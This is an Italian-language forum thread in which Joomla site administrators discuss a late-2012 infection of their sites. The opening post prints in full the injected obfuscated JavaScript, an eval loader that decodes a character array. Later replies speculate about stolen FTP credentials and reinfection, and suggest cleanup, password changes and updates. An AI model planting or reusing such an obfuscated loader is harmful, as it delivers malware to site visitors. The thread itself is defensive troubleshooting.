Siti hackerati?

[ofiuco78]

Buongiorno a tutti,
mi scuso in anticipo per l'oggetto del post ma vorrei capire insieme a voi di cosa si tratta se hackeraggio o meno.
In tutti i siti che gestisco sia versione joomla 1.5 e 2.5 in questi giorni sembrerebbe esserci stato un intrusione poiche nelle index.php sia template che admin, nella pagine .js mi trovo modifiche al codice con l'inserimento del seguente codice:

--
try{window.document.body++}catch(gdsgsdg){dbshre=1;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,93,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,93,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,92,94,95,95,102,107,38,92,105,104,37,104,101,41,96,101,95,101,99,110,95,39,93,110,95,37,104,97,106,34,50,5,3,26,27,23,24,91,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,92,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,89,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,93,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,91,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,93,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,91,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,93,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,91,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,92,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-450!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq-(i%5-5-4));}z=s;e(s);}" />
--



Qualcuno di voi ha riscontrato lo stesso problema? Possibile che le modifiche notate sui file abbiano tutti la stessa data; 24 dicembre 2012.
una cosa così sincronizzata non mi è mai capitata di vederla.
Non sembra succedere nulla di che ai siti, per ora, solamente il fatto di vedere questo codice comparire nella grafica.
Soluzioni per evitare queste intrusioni se di ciò si tratta?
Ringrazio tutti anticipatamente

[alexred]

ciao ofiuco78,
nel servizio di hosting che utilizzi che pannello di controllo c'è?
cPanel o directadmin o altro?

[ofiuco78]

Ciao Alexred,
ti ringrazio per l'aiuto...guarda questa è una cosa strana che mi sta succendendo su diverse versioni di joomla installate e su hosting diversi...
sto continuando a correggere tutti i file e la cartelle/directory con relativi file manomessi sono quasi tutti...
dalla cartella modules a quella editors, xmlrpc a quella administrator.
Quindi non solo template ma cuore di joomla.
Ho cercato in rete quello script che inizia e viene chiuso con questo codice #336988# ed ho trovato il mio problema su altri siti...
la data di modifica è sempre 24 dicembre..

[Vote4Cthulhu]

mi è capitato anche a me, credo sia dovuto a un virus che mi sono preso sul mio computer (il simpaticissimo virus "il tuo sito è stato bloccato")

per ora ho capito che inserisce del codice racchiuso tra #336988# e #/336988# in .htaccess e nei file index.php (però in questi prima aggiunge i tag di apertura e chiusura del php)

quindi cancellando la parte nell'htaccess e nei file index.php del core di joomla e dei singoli (tutti) template si dovrebbe risolvere...

MA ATTENZIONE questo non basta perchè mi è successo di nuovo dopo meno di 24 ore.

quindi ci dev'essere qualcos'altro.


(ho riscontrato problemi anche nei file index.html di alcuni siti senza joomla)

[Vote4Cthulhu]

sto continuando a correggere tutti i file e la cartelle/directory con relativi file manomessi sono quasi tutti...
dalla cartella modules a quella editors, xmlrpc a quella administrator.

scusa puoi essere più preciso?

io ho trovato quel codice solo nell'index.php dei template e nell'htaccess

[Vulpiani]

è evidente che c'è da qualche parte un piccolo script che fa in modo che vengano modificati nuovamente i file...

[Vote4Cthulhu]

sicuro?

e dove potrebbe stare?

cioè come lo trovo?

io ho dei siti di clienti che sto pulendo e tenendo sotto controllo

poi ho dei sitarelli miei mezzi morti di cui non me ne importa niente e con cui ho fatto e sto facendo delle prove, al limite posso pure prenderne uno e renderlo scaricabile così ci aiutate a trovare il codice da rimuovere.

[Vulpiani]

non saprei proprio dirti, sto vivendo lo stesso problema. Ho passato i permessi dei file incriminati (gli stessi tuoi suppongo) a 444... e sai cos'è successo? Mi si è cancellato index.php, quello principale...non so mica che fare?

[Vote4Cthulhu]

abbassando i permessi ti si è cancellato l'index.php? andiamo bene...

comunque ora sto chiedendo i file di log a register,
spiegando bene come sono andate le cose,
visto che la prima volta mi hanno risposto che i loro server sono sicuri...
grazie! è il mio windows7 che non è sicuro!!!

[Vulpiani]

non saprei, forse in realtà non c'entra proprio nulla con tutta questa faccenda il tuo windows, io in fondo c'ho ubuntu... (non adesso, s'intende, ma normalmente ho ubuntu!)

[Vote4Cthulhu]

non saprei, forse in realtà non c'entra proprio nulla con tutta questa faccenda il tuo windows, io in fondo c'ho ubuntu... (non adesso, s'intende, ma normalmente ho ubuntu!)

forse un bug di filezilla?

no perchè credo poco alla coincidenza di un virus che mi blocca il computer alle 10 del mattino e poi alle 12 mi accorgo che tutti i miei siti sono stati hackerati...

[Vulpiani]

nemmeno, suppongo che sia semplicemente qualche scherzone di un lamer  dappoco che abbia cercato tutti i siti in joomla tramite dns e abbia violato a caso, senza pensarci nemmeno... probabilmente, per come sono fatti questi programmini, non sa nemmeno quanti e quali siti ha rotto... sono degli idioti

[Vote4Cthulhu]

nemmeno, suppongo che sia semplicemente qualche scherzone di un lamer  dappoco che abbia cercato tutti i siti in joomla tramite dns e abbia violato a caso, senza pensarci nemmeno... probabilmente, per come sono fatti questi programmini, non sa nemmeno quanti e quali siti ha rotto... sono degli idioti

mi risultano infetti pure degli index.html su domini senza joomla,
ad esempio un dominio su cui avevo solo l'index.html e un'immagine e nessun altro file.

[Vote4Cthulhu]

ho fatto un pò di ricerche

su un sito dicono che la vulnerabilità è che si sono rubati le password dell'FTP
(spiegherebbe perchè ha infettato tutti i siti che ho sull'ftp
e non quelli di cui ho le password memorizzate sui browser)

faccio una prova cambiando la password a qualche sito,
ad altri non la cambio e vedo come va.

[Vulpiani]

se sono sullo stesso ftp è praticamente irrilevante cambiare le password del sito. Piuttosto, bisognerebbe cercare o il file nascosto che ogni tot infetta nuovamente i file, oppure bisognerebbe trovare un modo di impedire questa cosa... magari sapere anche da che componente/modulo dipende... mi puoi fare una lista?

[mau_develop]

no perchè credo poco alla coincidenza di un virus che mi blocca il computer alle 10 del mattino e poi alle 12 mi accorgo che tutti i miei siti sono stati hackerati...
----------------------------------------------------------------
...credi credi..

se io ho un file iniettato e ne ho un'altro uguale non modificato e uso quest'ultimo per sovrascrivere il primo (non un unione ma una sovrascrittura) come fa il malware a rimanere?
1) non sovrascrivo TUTTI i files per cui rimane da qualche parte
2) lo script non è lì

... semplice no?

[Vote4Cthulhu]

se sono sullo stesso ftp è praticamente irrilevante cambiare le password del sito. Piuttosto, bisognerebbe cercare o il file nascosto che ogni tot infetta nuovamente i file, oppure bisognerebbe trovare un modo di impedire questa cosa... magari sapere anche da che componente/modulo dipende... mi puoi fare una lista?

ha infettato pure siti che non hanno joomla, dubito quindi che dipende da un estensione di joomla

e parlo pure di siti composti solo dalla pagina index.html (20 righe di codice)

[bertoandrea86]

Cambia tutte le password, ftp, pannello di controllo, e pulisci tutto.
Forse hai il mio stesso hosting e mi era capitata la stessa identica cosa (l hosting inizia con M?). Pulivo e ripulivo, nada, cambiato le pwd e il problema è stato risolto.
Non dipende da Joomla.

[Vote4Cthulhu]

ho avuto lo stesso problema su tutti i siti a cui accedevo tramite ftp,
non su quelli a cui accedevo tramite browser con password salvate,
su siti con joomla e su siti con solo pagina una index.htm,
su più hosting...

quindi non credo proprio che dipenda dall'hosting ma dall'ftp (leggi: computer infettato).


p.s.: se uno gestisce solo un sito è facile cambiare le password,
se hai tanti domini diversi, su più hosting diversi, è più complicato.

[paolobros]

Scusate se mi intrometto ma è successo anche a me su quasi tutti i siti che ho realizzato.
Innanzi tutto per vedere se c'è qualcosa e dove sta ho utilizzato questo tool online: http://sitecheck.sucuri.net/scanner/
Da qui potete vedere quali sono i files infetti e qual'è lo script.
Il tool mi ha evidenziato diversi files js (su pliugin, moduli e sul template).
Una volta corretti vanno ricaricati e cambiate le password ftp. In questa maniera ho risolto.
Il mio pc era pulitissimo. L'unica pecca era che avevo le versioni di Joomla che andavano dalla 2.5.4 alla 2.5.7. Installata la 2.5.8 e corretti gli errori non si sono più verificati problemi.